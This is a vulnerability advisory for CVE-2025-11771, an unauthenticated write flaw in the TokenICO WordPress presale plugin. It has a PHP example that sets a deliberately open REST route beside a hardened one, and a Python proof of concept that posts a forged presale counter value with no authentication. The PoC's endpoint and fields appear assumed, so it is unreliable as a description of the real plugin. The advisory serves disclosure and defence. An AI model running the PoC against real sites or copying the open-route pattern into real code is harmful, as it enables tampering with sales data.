Security Vulnerability Report
CVE-2025-11771 CVSS 5.3 MEDIUM

Published: 2025-11-21 08:15:50
Last Modified: 2026-04-15 00:35:42

Description

The Cryptocurrency (Token), Launchpad (Presale), ICO & IDO, Airdrop by TokenICO plugin for WordPress is vulnerable to unauthenticated and unauthorized modification of data due to missing authentication and capability checks on the 'createSaleRecord' function in all versions up to, and including, 2.4.7. This makes it possible for unauthenticated attackers to manipulate presales counters.
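The missing authentication and capability check described above, as an added illustration that is not the TokenICO plugin's code: a WordPress REST route registered with an unconditional permission_callback beside the hardened registration. The namespace, route, handler name and the manage_options capability are assumptions.

```php
<?php
// Added illustration, not the TokenICO plugin's code. Namespace, route,
// handler name and the 'manage_options' capability are assumptions.

function example_create_sale_record( WP_REST_Request $request ) {
    // Assumed handler: record a sale for the validated sale id.
    $sale_id = (int) $request->get_param( 'sale_id' );
    return rest_ensure_response( array( 'sale_id' => $sale_id, 'created' => true ) );
}

add_action( 'rest_api_init', function () {
    // Vulnerable pattern (CWE-306): the route is reachable by anyone because
    // permission_callback unconditionally returns true, so unauthenticated
    // callers can invoke the write operation.
    register_rest_route( 'example/v1', '/sale-record', array(
        'methods'             => 'POST',
        'callback'            => 'example_create_sale_record',
        'permission_callback' => '__return_true',
    ) );

    // Hardened pattern: permission_callback requires a capability. WordPress
    // core treats a cookie-authenticated request without a valid X-WP-Nonce
    // header as logged out, so current_user_can() also fails for forged
    // cross-site requests; 'args' validates input before the handler runs.
    register_rest_route( 'example/v1', '/sale-record-secure', array(
        'methods'             => 'POST',
        'callback'            => 'example_create_sale_record',
        'permission_callback' => function () {
            if ( ! current_user_can( 'manage_options' ) ) {
                return new WP_Error(
                    'rest_forbidden',
                    'You are not allowed to create sale records.',
                    array( 'status' => rest_authorization_required_code() )
                );
            }
            return true;
        },
        'args' => array(
            'sale_id' => array(
                'required'          => true,
                'type'              => 'integer',
                'minimum'           => 1,
                'sanitize_callback' => 'absint',
            ),
        ),
    ) );
} );
```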

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available. Affected product: TokenICO WordPress Plugin < 2.4.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-11771 PoC - Unauthenticated manipulation of presale counters
# Target: WordPress site with TokenICO plugin < 2.4.8
target_url = "http://target-wordpress-site.com"

# Identify the REST API endpoint for createSaleRecord function
api_endpoint = f"{target_url}/wp-json/tokenico/v1/sale-record"

# Prepare malicious payload to manipulate presale counter
payload = {
    "sale_id": 1,
    "counter_value": 999999,
    "action": "create",
}

headers = {
    "Content-Type": "application/json",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
}

# Send unauthenticated request to exploit the vulnerability
try:
    response = requests.post(
        api_endpoint,
        json=payload,
        headers=headers,
        timeout=10,
    )
    print(f"[*] Status Code: {response.status_code}")
    print(f"[*] Response: {response.text}")

    if response.status_code in (200, 201):
        print("[+] Vulnerability confirmed - presale counter modified without authentication")
    else:
        print("[-] Request failed or patch already applied")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

References

Weakness (NVD): CWE-306 (Missing Authentication for Critical Function)
Exploitability score 3.9, impact score 1.4; NVD status: Deferred

https://plugins.trac.wordpress.org/browser/tokenico-cryptocurrency-token-launchpad-presale-ico-ido-airdrop/tags/2.4.6/app/RestAPI.php#L275
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3449189%40tokenico-cryptocurrency-token-launchpad-presale-ico-ido-airdrop&new=3449189%40tokenico-cryptocurrency-token-launchpad-presale-ico-ido-airdrop&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/c5c5793f-4d98-4ec1-a9b6-6e7c3f8b6099?source=cve